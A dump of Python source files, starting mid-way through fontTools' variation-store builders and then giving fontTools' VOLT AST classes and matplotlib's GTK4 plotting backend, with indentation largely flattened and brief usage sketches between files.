self.NumShorts = max((i for i,b in enumerate(byte_lengths) if b > 2), default=-1) + 1
self.NumShorts |= 0x8000
else:
self.NumShorts = max((i for i,b in enumerate(byte_lengths) if b > 1), default=-1) + 1
self.VarRegionCount = len(self.VarRegionIndex)
return self
ot.VarData.calculateNumShorts = VarData_calculateNumShorts
def VarData_CalculateNumShorts(self, optimize=True):
"""Deprecated name for VarData_calculateNumShorts() which
defaults to optimize=True. Use varData.calculateNumShorts()
or varData.optimize()."""
return VarData_calculateNumShorts(self, optimize=optimize)
def VarData_optimize(self):
return VarData_calculateNumShorts(self, optimize=True)
ot.VarData.optimize = VarData_optimize
def buildVarData(varRegionIndices, items, optimize=True):
self = ot.VarData()
self.VarRegionIndex = list(varRegionIndices)
regionCount = self.VarRegionCount = len(self.VarRegionIndex)
records = self.Item = []
if items:
for item in items:
assert len(item) == regionCount
records.append(list(item))
self.ItemCount = len(self.Item)
self.calculateNumShorts(optimize=optimize)
return self
def buildVarStore(varRegionList, varDataList):
self = ot.VarStore()
self.Format = 1
self.VarRegionList = varRegionList
self.VarData = list(varDataList)
self.VarDataCount = len(self.VarData)
return self
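# Usage sketch (axis tag and delta values below are illustrative):
#
#   axisTags = ["wght"]
#   regions = buildVarRegionList([{"wght": (0.0, 1.0, 1.0)}], axisTags)
#   data = buildVarData([0], [[100], [-20]])
#   store = buildVarStore(regions, [data])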
# Variation helpers
def buildVarIdxMap(varIdxes, glyphOrder):
self = ot.VarIdxMap()
self.mapping = {g:v for g,v in zip(glyphOrder, varIdxes)}
return self
def buildDeltaSetIndexMap(varIdxes):
self = ot.DeltaSetIndexMap()
self.mapping = list(varIdxes)
self.Format = 1 if len(varIdxes) > 0xFFFF else 0
return self
def buildVarDevTable(varIdx):
self = ot.Device()
self.DeltaFormat = 0x8000
self.StartSize = varIdx >> 16
self.EndSize = varIdx & 0xFFFF
return self
```
#### File: fontTools/voltLib/ast.py
```python
from fontTools.voltLib.error import VoltLibError
from typing import NamedTuple
class Pos(NamedTuple):
adv: int
dx: int
dy: int
adv_adjust_by: dict
dx_adjust_by: dict
dy_adjust_by: dict
def __str__(self):
res = ' POS'
for attr in ('adv', 'dx', 'dy'):
value = getattr(self, attr)
if value is not None:
res += f' {attr.upper()} {value}'
adjust_by = getattr(self, f'{attr}_adjust_by', {})
for size, adjustment in adjust_by.items():
res += f' ADJUST_BY {adjustment} AT {size}'
res += ' END_POS'
return res
class Element(object):
def __init__(self, location=None):
self.location = location
def build(self, builder):
pass
def __str__(self):
raise NotImplementedError
class Statement(Element):
pass
class Expression(Element):
pass
class VoltFile(Statement):
def __init__(self):
Statement.__init__(self, location=None)
self.statements = []
def build(self, builder):
for s in self.statements:
s.build(builder)
def __str__(self):
return '\n' + '\n'.join(str(s) for s in self.statements) + ' END\n'
class GlyphDefinition(Statement):
def __init__(self, name, gid, gunicode, gtype, components, location=None):
Statement.__init__(self, location)
self.name = name
self.id = gid
self.unicode = gunicode
self.type = gtype
self.components = components
def __str__(self):
res = f'DEF_GLYPH "{self.name}" ID {self.id}'
if self.unicode is not None:
if len(self.unicode) > 1:
unicodes = ','.join(f'U+{u:04X}' for u in self.unicode)
res += f' UNICODEVALUES "{unicodes}"'
else:
res += f' UNICODE {self.unicode[0]}'
if self.type is not None:
res += f' TYPE {self.type}'
if self.components is not None:
res += f' COMPONENTS {self.components}'
res += ' END_GLYPH'
return res
class GroupDefinition(Statement):
def __init__(self, name, enum, location=None):
Statement.__init__(self, location)
self.name = name
self.enum = enum
self.glyphs_ = None
def glyphSet(self, groups=None):
if groups is not None and self.name in groups:
raise VoltLibError(
'Group "%s" contains itself.' % (self.name),
self.location)
if self.glyphs_ is None:
if groups is None:
groups = set({self.name})
else:
groups.add(self.name)
self.glyphs_ = self.enum.glyphSet(groups)
return self.glyphs_
def __str__(self):
enum = self.enum and str(self.enum) or ''
return f'DEF_GROUP "{self.name}"\n{enum}\nEND_GROUP'
class GlyphName(Expression):
"""A single glyph name, such as cedilla."""
def __init__(self, glyph, location=None):
Expression.__init__(self, location)
self.glyph = glyph
def glyphSet(self):
return (self.glyph,)
def __str__(self):
return f' GLYPH "{self.glyph}"'
class Enum(Expression):
"""An enum"""
def __init__(self, enum, location=None):
Expression.__init__(self, location)
self.enum = enum
def __iter__(self):
for e in self.glyphSet():
yield e
def glyphSet(self, groups=None):
glyphs = []
for element in self.enum:
if isinstance(element, (GroupName, Enum)):
glyphs.extend(element.glyphSet(groups))
else:
glyphs.extend(element.glyphSet())
return tuple(glyphs)
def __str__(self):
enum = ''.join(str(e) for e in self.enum)
return f' ENUM{enum} END_ENUM'
class GroupName(Expression):
"""A glyph group"""
def __init__(self, group, parser, location=None):
Expression.__init__(self, location)
self.group = group
self.parser_ = parser
def glyphSet(self, groups=None):
group = self.parser_.resolve_group(self.group)
if group is not None:
self.glyphs_ = group.glyphSet(groups)
return self.glyphs_
else:
raise VoltLibError(
'Group "%s" is used but undefined.' % (self.group),
self.location)
def __str__(self):
return f' GROUP "{self.group}"'
class Range(Expression):
"""A glyph range"""
def __init__(self, start, end, parser, location=None):
Expression.__init__(self, location)
self.start = start
self.end = end
self.parser = parser
def glyphSet(self):
return tuple(self.parser.glyph_range(self.start, self.end))
def __str__(self):
return f' RANGE "{self.start}" TO "{self.end}"'
class ScriptDefinition(Statement):
def __init__(self, name, tag, langs, location=None):
Statement.__init__(self, location)
self.name = name
self.tag = tag
self.langs = langs
def __str__(self):
res = 'DEF_SCRIPT'
if self.name is not None:
res += f' NAME "{self.name}"'
res += f' TAG "{self.tag}"\n\n'
for lang in self.langs:
res += f'{lang}'
res += 'END_SCRIPT'
return res
class LangSysDefinition(Statement):
def __init__(self, name, tag, features, location=None):
Statement.__init__(self, location)
self.name = name
self.tag = tag
self.features = features
def __str__(self):
res = 'DEF_LANGSYS'
if self.name is not None:
res += f' NAME "{self.name}"'
res += f' TAG "{self.tag}"\n\n'
for feature in self.features:
res += f'{feature}'
res += 'END_LANGSYS\n'
return res
class FeatureDefinition(Statement):
def __init__(self, name, tag, lookups, location=None):
Statement.__init__(self, location)
self.name = name
self.tag = tag
self.lookups = lookups
def __str__(self):
res = f'DEF_FEATURE NAME "{self.name}" TAG "{self.tag}"\n'
res += ' ' + ' '.join(f'LOOKUP "{l}"' for l in self.lookups) + '\n'
res += 'END_FEATURE\n'
return res
class LookupDefinition(Statement):
def __init__(self, name, process_base, process_marks, mark_glyph_set,
direction, reversal, comments, context, sub, pos,
location=None):
Statement.__init__(self, location)
self.name = name
self.process_base = process_base
self.process_marks = process_marks
self.mark_glyph_set = mark_glyph_set
self.direction = direction
self.reversal = reversal
self.comments = comments
self.context = context
self.sub = sub
self.pos = pos
def __str__(self):
res = f'DEF_LOOKUP "{self.name}"'
res += f' {self.process_base and "PROCESS_BASE" or "SKIP_BASE"}'
if self.process_marks:
res += ' PROCESS_MARKS '
if self.mark_glyph_set:
res += f'MARK_GLYPH_SET "{self.mark_glyph_set}"'
elif isinstance(self.process_marks, str):
res += f'"{self.process_marks}"'
else:
res += 'ALL'
else:
res += ' SKIP_MARKS'
if self.direction is not None:
res += f' DIRECTION {self.direction}'
if self.reversal:
res += ' REVERSAL'
if self.comments is not None:
comments = self.comments.replace('\n', r'\n')
res += f'\nCOMMENTS "{comments}"'
if self.context:
res += '\n' + '\n'.join(str(c) for c in self.context)
else:
res += '\nIN_CONTEXT\nEND_CONTEXT'
if self.sub:
res += f'\n{self.sub}'
if self.pos:
res += f'\n{self.pos}'
return res
class SubstitutionDefinition(Statement):
def __init__(self, mapping, location=None):
Statement.__init__(self, location)
self.mapping = mapping
def __str__(self):
res = 'AS_SUBSTITUTION\n'
for src, dst in self.mapping.items():
src = ''.join(str(s) for s in src)
dst = ''.join(str(d) for d in dst)
res += f'SUB{src}\nWITH{dst}\nEND_SUB\n'
res += 'END_SUBSTITUTION'
return res
class SubstitutionSingleDefinition(SubstitutionDefinition):
pass
class SubstitutionMultipleDefinition(SubstitutionDefinition):
pass
class SubstitutionLigatureDefinition(SubstitutionDefinition):
pass
class SubstitutionReverseChainingSingleDefinition(SubstitutionDefinition):
pass
class PositionAttachDefinition(Statement):
def __init__(self, coverage, coverage_to, location=None):
Statement.__init__(self, location)
self.coverage = coverage
self.coverage_to = coverage_to
def __str__(self):
coverage = ''.join(str(c) for c in self.coverage)
res = f'AS_POSITION\nATTACH{coverage}\nTO'
for coverage, anchor in self.coverage_to:
coverage = ''.join(str(c) for c in coverage)
res += f'{coverage} AT ANCHOR "{anchor}"'
res += '\nEND_ATTACH\nEND_POSITION'
return res
class PositionAttachCursiveDefinition(Statement):
def __init__(self, coverages_exit, coverages_enter, location=None):
Statement.__init__(self, location)
self.coverages_exit = coverages_exit
self.coverages_enter = coverages_enter
def __str__(self):
res = 'AS_POSITION\nATTACH_CURSIVE'
for coverage in self.coverages_exit:
coverage = ''.join(str(c) for c in coverage)
res += f'\nEXIT {coverage}'
for coverage in self.coverages_enter:
coverage = ''.join(str(c) for c in coverage)
res += f'\nENTER {coverage}'
res += '\nEND_ATTACH\nEND_POSITION'
return res
class PositionAdjustPairDefinition(Statement):
def __init__(self, coverages_1, coverages_2, adjust_pair, location=None):
Statement.__init__(self, location)
self.coverages_1 = coverages_1
self.coverages_2 = coverages_2
self.adjust_pair = adjust_pair
def __str__(self):
res = 'AS_POSITION\nADJUST_PAIR\n'
for coverage in self.coverages_1:
coverage = ' '.join(str(c) for c in coverage)
res += f' FIRST {coverage}'
res += '\n'
for coverage in self.coverages_2:
coverage = ' '.join(str(c) for c in coverage)
res += f' SECOND {coverage}'
res += '\n'
for (id_1, id_2), (pos_1, pos_2) in self.adjust_pair.items():
res += f' {id_1} {id_2} BY{pos_1}{pos_2}\n'
res += '\nEND_ADJUST\nEND_POSITION'
return res
class PositionAdjustSingleDefinition(Statement):
def __init__(self, adjust_single, location=None):
Statement.__init__(self, location)
self.adjust_single = adjust_single
def __str__(self):
res = 'AS_POSITION\nADJUST_SINGLE'
for coverage, pos in self.adjust_single:
coverage = ''.join(str(c) for c in coverage)
res += f'{coverage} BY{pos}'
res += '\nEND_ADJUST\nEND_POSITION'
return res
class ContextDefinition(Statement):
def __init__(self, ex_or_in, left=None, right=None, location=None):
Statement.__init__(self, location)
self.ex_or_in = ex_or_in
self.left = left if left is not None else []
self.right = right if right is not None else []
def __str__(self):
res = self.ex_or_in + '\n'
for coverage in self.left:
coverage = ''.join(str(c) for c in coverage)
res += f' LEFT{coverage}\n'
for coverage in self.right:
coverage = ''.join(str(c) for c in coverage)
res += f' RIGHT{coverage}\n'
res += 'END_CONTEXT'
return res
class AnchorDefinition(Statement):
def __init__(self, name, gid, glyph_name, component, locked,
pos, location=None):
Statement.__init__(self, location)
self.name = name
self.gid = gid
self.glyph_name = glyph_name
self.component = component
self.locked = locked
self.pos = pos
def __str__(self):
        locked = ' LOCKED' if self.locked else ''
return (f'DEF_ANCHOR "{self.name}"'
f' ON {self.gid}'
f' GLYPH {self.glyph_name}'
f' COMPONENT {self.component}'
f'{locked}'
f' AT {self.pos} END_ANCHOR')
class SettingDefinition(Statement):
def __init__(self, name, value, location=None):
Statement.__init__(self, location)
self.name = name
self.value = value
def __str__(self):
if self.value is True:
return f'{self.name}'
if isinstance(self.value, (tuple, list)):
value = " ".join(str(v) for v in self.value)
return f'{self.name} {value}'
return f'{self.name} {self.value}'
```
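To make the serialization behaviour of these AST nodes concrete, here is a small hypothetical sketch (the setting names and values are illustrative, not taken from any real VOLT project); `__str__` renders each node back as VOLT source text.
```python
# Hypothetical usage sketch of the SettingDefinition node defined above.
setting = SettingDefinition('GRID_PPEM', 20)
print(setting)   # -> GRID_PPEM 20
flag = SettingDefinition('PROCESS_MARKS', True)
print(flag)      # -> PROCESS_MARKS  (a bare name is emitted when the value is True)
```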
#### File: matplotlib/backends/backend_gtk4.py
```python
import functools
import io
import os
from pathlib import Path
import sys
import matplotlib as mpl
from matplotlib import _api, backend_tools, cbook
from matplotlib._pylab_helpers import Gcf
from matplotlib.backend_bases import (
_Backend, FigureCanvasBase, FigureManagerBase, NavigationToolbar2,
TimerBase, ToolContainerBase)
from matplotlib.backend_tools import Cursors
from matplotlib.figure import Figure
from matplotlib.widgets import SubplotTool
try:
import gi
except ImportError as err:
raise ImportError("The GTK4 backends require PyGObject") from err
try:
# :raises ValueError: If module/version is already loaded, already
# required, or unavailable.
gi.require_version("Gtk", "4.0")
except ValueError as e:
    # In this case we want to re-raise as ImportError so that the
    # auto-backend selection logic correctly skips this backend.
raise ImportError from e
from gi.repository import Gio, GLib, GObject, Gtk, Gdk, GdkPixbuf
from ._backend_gtk import (
_create_application, _shutdown_application,
backend_version, _BackendGTK, _NavigationToolbar2GTK,
TimerGTK as TimerGTK4,
ConfigureSubplotsGTK as ConfigureSubplotsGTK4,
RubberbandGTK as RubberbandGTK4,
)
def _mpl_to_gtk_cursor(mpl_cursor):
return _api.check_getitem({
Cursors.MOVE: "move",
Cursors.HAND: "pointer",
Cursors.POINTER: "default",
Cursors.SELECT_REGION: "crosshair",
Cursors.WAIT: "wait",
Cursors.RESIZE_HORIZONTAL: "ew-resize",
Cursors.RESIZE_VERTICAL: "ns-resize",
}, cursor=mpl_cursor)
class FigureCanvasGTK4(Gtk.DrawingArea, FigureCanvasBase):
required_interactive_framework = "gtk4"
supports_blit = False
_timer_cls = TimerGTK4
_context_is_scaled = False
def __init__(self, figure=None):
FigureCanvasBase.__init__(self, figure)
GObject.GObject.__init__(self)
self.set_hexpand(True)
self.set_vexpand(True)
self._idle_draw_id = 0
self._lastCursor = None
self._rubberband_rect = None
self.set_draw_func(self._draw_func)
self.connect('resize', self.resize_event)
self.connect('notify::scale-factor', self._update_device_pixel_ratio)
click = Gtk.GestureClick()
click.set_button(0) # All buttons.
click.connect('pressed', self.button_press_event)
click.connect('released', self.button_release_event)
self.add_controller(click)
key = Gtk.EventControllerKey()
key.connect('key-pressed', self.key_press_event)
key.connect('key-released', self.key_release_event)
self.add_controller(key)
motion = Gtk.EventControllerMotion()
motion.connect('motion', self.motion_notify_event)
motion.connect('enter', self.enter_notify_event)
motion.connect('leave', self.leave_notify_event)
self.add_controller(motion)
scroll = Gtk.EventControllerScroll.new(
Gtk.EventControllerScrollFlags.VERTICAL)
scroll.connect('scroll', self.scroll_event)
self.add_controller(scroll)
self.set_focusable(True)
css = Gtk.CssProvider()
css.load_from_data(b".matplotlib-canvas { background-color: white; }")
style_ctx = self.get_style_context()
style_ctx.add_provider(css, Gtk.STYLE_PROVIDER_PRIORITY_APPLICATION)
style_ctx.add_class("matplotlib-canvas")
def pick(self, mouseevent):
# GtkWidget defines pick in GTK4, so we need to override here to work
# with the base implementation we want.
FigureCanvasBase.pick(self, mouseevent)
def destroy(self):
self.close_event()
def set_cursor(self, cursor):
# docstring inherited
self.set_cursor_from_name(_mpl_to_gtk_cursor(cursor))
def _mouse_event_coords(self, x, y):
"""
Calculate mouse coordinates in physical pixels.
        GTK uses logical pixels, but the figure is scaled to physical pixels for
        rendering. Transform to physical pixels so that all of the downstream
        transforms work as expected.
Also, the origin is different and needs to be corrected.
"""
x = x * self.device_pixel_ratio
# flip y so y=0 is bottom of canvas
y = self.figure.bbox.height - y * self.device_pixel_ratio
return x, y
def scroll_event(self, controller, dx, dy):
FigureCanvasBase.scroll_event(self, 0, 0, dy)
return True
def button_press_event(self, controller, n_press, x, y):
x, y = self._mouse_event_coords(x, y)
FigureCanvasBase.button_press_event(self, x, y,
controller.get_current_button())
self.grab_focus()
def button_release_event(self, controller, n_press, x, y):
x, y = self._mouse_event_coords(x, y)
FigureCanvasBase.button_release_event(self, x, y,
controller.get_current_button())
def key_press_event(self, controller, keyval, keycode, state):
key = self._get_key(keyval, keycode, state)
FigureCanvasBase.key_press_event(self, key)
return True
def key_release_event(self, controller, keyval, keycode, state):
key = self._get_key(keyval, keycode, state)
FigureCanvasBase.key_release_event(self, key)
return True
def motion_notify_event(self, controller, x, y):
x, y = self._mouse_event_coords(x, y)
FigureCanvasBase.motion_notify_event(self, x, y)
def leave_notify_event(self, controller):
FigureCanvasBase.leave_notify_event(self)
def enter_notify_event(self, controller, x, y):
x, y = self._mouse_event_coords(x, y)
FigureCanvasBase.enter_notify_event(self, xy=(x, y))
def resize_event(self, area, width, height):
self._update_device_pixel_ratio()
dpi = self.figure.dpi
winch = width * self.device_pixel_ratio / dpi
hinch = height * self.device_pixel_ratio / dpi
self.figure.set_size_inches(winch, hinch, forward=False)
FigureCanvasBase.resize_event(self)
self.draw_idle()
def _get_key(self, keyval, keycode, state):
unikey = chr(Gdk.keyval_to_unicode(keyval))
key = cbook._unikey_or_keysym_to_mplkey(
unikey,
Gdk.keyval_name(keyval))
modifiers = [
(Gdk.ModifierType.CONTROL_MASK, 'ctrl'),
(Gdk.ModifierType.ALT_MASK, 'alt'),
(Gdk.ModifierType.SHIFT_MASK, 'shift'),
(Gdk.ModifierType.SUPER_MASK, 'super'),
]
for key_mask, prefix in modifiers:
if state & key_mask:
if not (prefix == 'shift' and unikey.isprintable()):
key = f'{prefix}+{key}'
return key
def _update_device_pixel_ratio(self, *args, **kwargs):
# We need to be careful in cases with mixed resolution displays if
# device_pixel_ratio changes.
if self._set_device_pixel_ratio(self.get_scale_factor()):
self.draw()
def _draw_rubberband(self, rect):
self._rubberband_rect = rect
# TODO: Only update the rubberband area.
self.queue_draw()
def _draw_func(self, drawing_area, ctx, width, height):
self.on_draw_event(self, ctx)
self._post_draw(self, ctx)
def _post_draw(self, widget, ctx):
if self._rubberband_rect is None:
return
lw = 1
dash = 3
if not self._context_is_scaled:
x0, y0, w, h = (dim / self.device_pixel_ratio
for dim in self._rubberband_rect)
else:
x0, y0, w, h = self._rubberband_rect
lw *= self.device_pixel_ratio
dash *= self.device_pixel_ratio
x1 = x0 + w
y1 = y0 + h
# Draw the lines from x0, y0 towards x1, y1 so that the
# dashes don't "jump" when moving the zoom box.
ctx.move_to(x0, y0)
ctx.line_to(x0, y1)
ctx.move_to(x0, y0)
ctx.line_to(x1, y0)
ctx.move_to(x0, y1)
ctx.line_to(x1, y1)
ctx.move_to(x1, y0)
ctx.line_to(x1, y1)
ctx.set_antialias(1)
ctx.set_line_width(lw)
ctx.set_dash((dash, dash), 0)
ctx.set_source_rgb(0, 0, 0)
ctx.stroke_preserve()
ctx.set_dash((dash, dash), dash)
ctx.set_source_rgb(1, 1, 1)
ctx.stroke()
def on_draw_event(self, widget, ctx):
# to be overwritten by GTK4Agg or GTK4Cairo
pass
def draw(self):
# docstring inherited
if self.is_drawable():
self.queue_draw()
def draw_idle(self):
# docstring inherited
if self._idle_draw_id != 0:
return
def idle_draw(*args):
try:
self.draw()
finally:
self._idle_draw_id = 0
return False
self._idle_draw_id = GLib.idle_add(idle_draw)
def flush_events(self):
# docstring inherited
context = GLib.MainContext.default()
while context.pending():
context.iteration(True)
class FigureManagerGTK4(FigureManagerBase):
"""
Attributes
----------
canvas : `FigureCanvas`
The FigureCanvas instance
num : int or str
The Figure number
toolbar : Gtk.Box
The toolbar
vbox : Gtk.VBox
The Gtk.VBox containing the canvas and toolbar
window : Gtk.Window
The Gtk.Window
"""
def __init__(self, canvas, num):
app = _create_application()
self.window = Gtk.Window()
app.add_window(self.window)
super().__init__(canvas, num)
self.vbox = Gtk.Box()
self.vbox.set_property("orientation", Gtk.Orientation.VERTICAL)
self.window.set_child(self.vbox)
self.vbox.prepend(self.canvas)
# calculate size for window
w, h = self.canvas.get_width_height()
self.toolbar = self._get_toolbar()
if self.toolmanager:
backend_tools.add_tools_to_manager(self.toolmanager)
if self.toolbar:
backend_tools.add_tools_to_container(self.toolbar)
if self.toolbar is not None:
sw = Gtk.ScrolledWindow(vscrollbar_policy=Gtk.PolicyType.NEVER)
sw.set_child(self.toolbar)
self.vbox.append(sw)
min_size, nat_size = self.toolbar.get_preferred_size()
h += nat_size.height
self.window.set_default_size(w, h)
self._destroying = False
self.window.connect("destroy", lambda *args: Gcf.destroy(self))
self.window.connect("close-request", lambda *args: Gcf.destroy(self))
if mpl.is_interactive():
self.window.show()
self.canvas.draw_idle()
self.canvas.grab_focus()
def destroy(self, *args):
if self._destroying:
# Otherwise, this can be called twice when the user presses 'q',
# which calls Gcf.destroy(self), then this destroy(), then triggers
# Gcf.destroy(self) once again via
# `connect("destroy", lambda *args: Gcf.destroy(self))`.
return
self._destroying = True
self.window.destroy()
self.canvas.destroy()
def show(self):
# show the figure window
self.window.show()
self.canvas.draw()
if mpl.rcParams['figure.raise_window']:
if self.window.get_surface():
self.window.present()
else:
# If this is called by a callback early during init,
# self.window (a GtkWindow) may not have an associated
# low-level GdkSurface (self.window.get_surface()) yet, and
# present() would crash.
_api.warn_external("Cannot raise window yet to be setup")
def full_screen_toggle(self):
if not self.window.is_fullscreen():
self.window.fullscreen()
else:
self.window.unfullscreen()
def _get_toolbar(self):
# must be inited after the window, drawingArea and figure
# attrs are set
if mpl.rcParams['toolbar'] == 'toolbar2':
toolbar = NavigationToolbar2GTK4(self.canvas, self.window)
elif mpl.rcParams['toolbar'] == 'toolmanager':
toolbar = ToolbarGTK4(self.toolmanager)
else:
toolbar = None
return toolbar
def get_window_title(self):
return self.window.get_title()
def set_window_title(self, title):
self.window.set_title(title)
def resize(self, width, height):
"""Set the canvas size in pixels."""
width = int(width / self.canvas.device_pixel_ratio)
height = int(height / self.canvas.device_pixel_ratio)
if self.toolbar:
min_size, nat_size = self.toolbar.get_preferred_size()
height += nat_size.height
canvas_size = self.canvas.get_allocation()
self.window.set_default_size(width, height)
class NavigationToolbar2GTK4(_NavigationToolbar2GTK, Gtk.Box):
def __init__(self, canvas, window):
self.win = window
Gtk.Box.__init__(self)
self.add_css_class('toolbar')
self._gtk_ids = {}
for text, tooltip_text, image_file, callback in self.toolitems:
if text is None:
self.append(Gtk.Separator())
continue
image = Gtk.Image.new_from_gicon(
Gio.Icon.new_for_string(
str(cbook._get_data_path('images',
f'{image_file}-symbolic.svg'))))
self._gtk_ids[text] = button = (
Gtk.ToggleButton() if callback in ['zoom', 'pan'] else
Gtk.Button())
button.set_child(image)
button.add_css_class('flat')
button.add_css_class('image-button')
# Save the handler id, so that we can block it as needed.
button._signal_handler = button.connect(
'clicked', getattr(self, callback))
button.set_tooltip_text(tooltip_text)
self.append(button)
# This filler item ensures the toolbar is always at least two text
# lines high. Otherwise the canvas gets redrawn as the mouse hovers
# over images because those use two-line messages which resize the
# toolbar.
label = Gtk.Label()
label.set_markup(
'<small>\N{NO-BREAK SPACE}\n\N{NO-BREAK SPACE}</small>')
label.set_hexpand(True) # Push real message to the right.
self.append(label)
self.message = Gtk.Label()
self.append(self.message)
NavigationToolbar2.__init__(self, canvas)
def save_figure(self, *args):
dialog = Gtk.FileChooserNative(
title='Save the figure',
transient_for=self.canvas.get_root(),
action=Gtk.FileChooserAction.SAVE,
modal=True)
self._save_dialog = dialog # Must keep a reference.
ff = Gtk.FileFilter()
ff.set_name('All files')
ff.add_pattern('*')
dialog.add_filter(ff)
dialog.set_filter(ff)
formats = []
default_format = None
for i, (name, fmts) in enumerate(
self.canvas.get_supported_filetypes_grouped().items()):
ff = Gtk.FileFilter()
ff.set_name(name)
for fmt in fmts:
ff.add_pattern(f'*.{fmt}')
dialog.add_filter(ff)
formats.append(name)
if self.canvas.get_default_filetype() in fmts:
default_format = i
# Setting the choice doesn't always work, so make sure the default
# format is first.
formats = [formats[default_format], *formats[:default_format],
*formats[default_format+1:]]
dialog.add_choice('format', 'File format', formats, formats)
dialog.set_choice('format', formats[default_format])
dialog.set_current_folder(Gio.File.new_for_path(
os.path.expanduser(mpl.rcParams['savefig.directory'])))
dialog.set_current_name(self.canvas.get_default_filename())
@functools.partial(dialog.connect, 'response')
def on_response(dialog, response):
file = dialog.get_file()
fmt = dialog.get_choice('format')
fmt = self.canvas.get_supported_filetypes_grouped()[fmt][0]
dialog.destroy()
self._save_dialog = None
if response != Gtk.ResponseType.ACCEPT:
return
# Save dir for next time, unless empty str (which means use cwd).
if mpl.rcParams['savefig.directory']:
parent = file.get_parent()
mpl.rcParams['savefig.directory'] = parent.get_path()
try:
self.canvas.figure.savefig(file.get_path(), format=fmt)
except Exception as e:
msg = Gtk.MessageDialog(
transient_for=self.canvas.get_root(),
message_type=Gtk.MessageType.ERROR,
buttons=Gtk.ButtonsType.OK, modal=True,
text=str(e))
msg.show()
dialog.show()
class ToolbarGTK4(ToolContainerBase, Gtk.Box):
_icon_extension = '-symbolic.svg'
def __init__(self, toolmanager):
ToolContainerBase.__init__(self, toolmanager)
Gtk.Box.__init__(self)
self.set_property('orientation', Gtk.Orientation.HORIZONTAL)
# Tool items are created later, but must appear before the message.
self._tool_box = Gtk.Box()
self.append(self._tool_box)
self._groups = {}
self._toolitems = {}
# This filler item ensures the toolbar is always at least two text
# lines high. Otherwise the canvas gets redrawn as the mouse hovers
# over images because those use two-line messages which resize the
# toolbar.
label = Gtk.Label()
label.set_markup(
'<small>\N{NO-BREAK SPACE}\n\N{NO-BREAK SPACE}</small>')
label.set_hexpand(True) # Push real message to the right.
self.append(label)
self._message = Gtk.Label()
self.append(self._message)
def add_toolitem(self, name, group, position, image_file, description,
toggle):
if toggle:
button = Gtk.ToggleButton()
else:
button = Gtk.Button()
button.set_label(name)
button.add_css_class('flat')
if image_file is not None:
image = Gtk.Image.new_from_gicon(
Gio.Icon.new_for_string(image_file))
button.set_child(image)
button.add_css_class('image-button')
if position is None:
position = -1
self._add_button(button, group, position)
signal = button.connect('clicked', self._call_tool, name)
button.set_tooltip_text(description)
self._toolitems.setdefault(name, [])
self._toolitems[name].append((button, signal))
def _find_child_at_position(self, group, position):
children = [None]
child = self._groups[group].get_first_child()
while child is not None:
children.append(child)
child = child.get_next_sibling()
return children[position]
def _add_button(self, button, group, position):
if group not in self._groups:
if self._groups:
self._add_separator()
group_box = Gtk.Box()
self._tool_box.append(group_box)
self._groups[group] = group_box
self._groups[group].insert_child_after(
button, self._find_child_at_position(group, position))
def _call_tool(self, btn, name):
self.trigger_tool(name)
def toggle_toolitem(self, name, toggled):
if name not in self._toolitems:
return
for toolitem, signal in self._toolitems[name]:
toolitem.handler_block(signal)
toolitem.set_active(toggled)
toolitem.handler_unblock(signal)
def remove_toolitem(self, name):
if name not in self._toolitems:
self.toolmanager.message_event(f'{name} not in toolbar', self)
return
for group in self._groups:
for toolitem, _signal in self._toolitems[name]:
if toolitem in self._groups[group]:
self._groups[group].remove(toolitem)
del self._toolitems[name]
def _add_separator(self):
sep = Gtk.Separator()
sep.set_property("orientation", Gtk.Orientation.VERTICAL)
self._tool_box.append(sep)
def set_message(self, s):
self._message.set_label(s)
class SaveFigureGTK4(backend_tools.SaveFigureBase):
def trigger(self, *args, **kwargs):
class PseudoToolbar:
canvas = self.figure.canvas
return NavigationToolbar2GTK4.save_figure(PseudoToolbar())
class HelpGTK4(backend_tools.ToolHelpBase):
def _normalize_shortcut(self, key):
"""
Convert Matplotlib key presses to GTK+ accelerator identifiers.
Related to `FigureCanvasGTK4._get_key`.
"""
special = {
'backspace': 'BackSpace',
'pagedown': 'Page_Down',
'pageup': 'Page_Up',
'scroll_lock': 'Scroll_Lock',
}
parts = key.split('+')
mods = ['<' + mod + '>' for mod in parts[:-1]]
key = parts[-1]
if key in special:
key = special[key]
elif len(key) > 1:
key = key.capitalize()
elif key.isupper():
mods += ['<shift>']
return ''.join(mods) + key
def _is_valid_shortcut(self, key):
"""
Check for a valid shortcut to be displayed.
- GTK will never send 'cmd+' (see `FigureCanvasGTK4._get_key`).
- The shortcut window only shows keyboard shortcuts, not mouse buttons.
"""
return 'cmd+' not in key and not key.startswith('MouseButton.')
def trigger(self, *args):
section = Gtk.ShortcutsSection()
for name, tool in sorted(self.toolmanager.tools.items()):
if not tool.description:
continue
# Putting everything in a separate group allows GTK to
# automatically split them into separate columns/pages, which is
# useful because we have lots of shortcuts, some with many keys
# that are very wide.
group = Gtk.ShortcutsGroup()
section.append(group)
# A hack to remove the title since we have no group naming.
child = group.get_first_child()
while child is not None:
child.set_visible(False)
child = child.get_next_sibling()
shortcut = Gtk.ShortcutsShortcut(
accelerator=' '.join(
self._normalize_shortcut(key)
for key in self.toolmanager.get_tool_keymap(name)
if self._is_valid_shortcut(key)),
title=tool.name,
subtitle=tool.description)
group.append(shortcut)
window = Gtk.ShortcutsWindow(
title='Help',
modal=True,
transient_for=self._figure.canvas.get_root())
window.set_child(section)
window.show()
class ToolCopyToClipboardGTK4(backend_tools.ToolCopyToClipboardBase):
def trigger(self, *args, **kwargs):
with io.BytesIO() as f:
self.canvas.print_rgba(f)
w, h = self.canvas.get_width_height()
pb = GdkPixbuf.Pixbuf.new_from_data(f.getbuffer(),
GdkPixbuf.Colorspace.RGB, True,
8, w, h, w*4)
clipboard = self.canvas.get_clipboard()
clipboard.set(pb)
backend_tools.ToolSaveFigure = SaveFigureGTK4
backend_tools.ToolConfigureSubplots = ConfigureSubplotsGTK4
backend_tools.ToolRubberband = RubberbandGTK4
backend_tools.ToolHelp = HelpGTK4
backend_tools.ToolCopyToClipboard = ToolCopyToClipboardGTK4
Toolbar = ToolbarGTK4
@_Backend.export
class _BackendGTK4(_BackendGTK):
FigureCanvas = FigureCanvasGTK4
FigureManager = FigureManagerGTK4
```
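For orientation, a minimal usage sketch for the backend above follows. It is hedged: it assumes PyGObject and GTK 4 are installed, and uses the standard backend names ("gtk4agg"/"gtk4cairo") that Matplotlib maps onto this module.
```python
# Minimal sketch, assuming PyGObject and GTK 4 are available in the environment.
import matplotlib
matplotlib.use("gtk4agg")    # or "gtk4cairo"; both are built on backend_gtk4
import matplotlib.pyplot as plt
fig, ax = plt.subplots()
ax.plot([0, 1, 2], [0, 1, 4])
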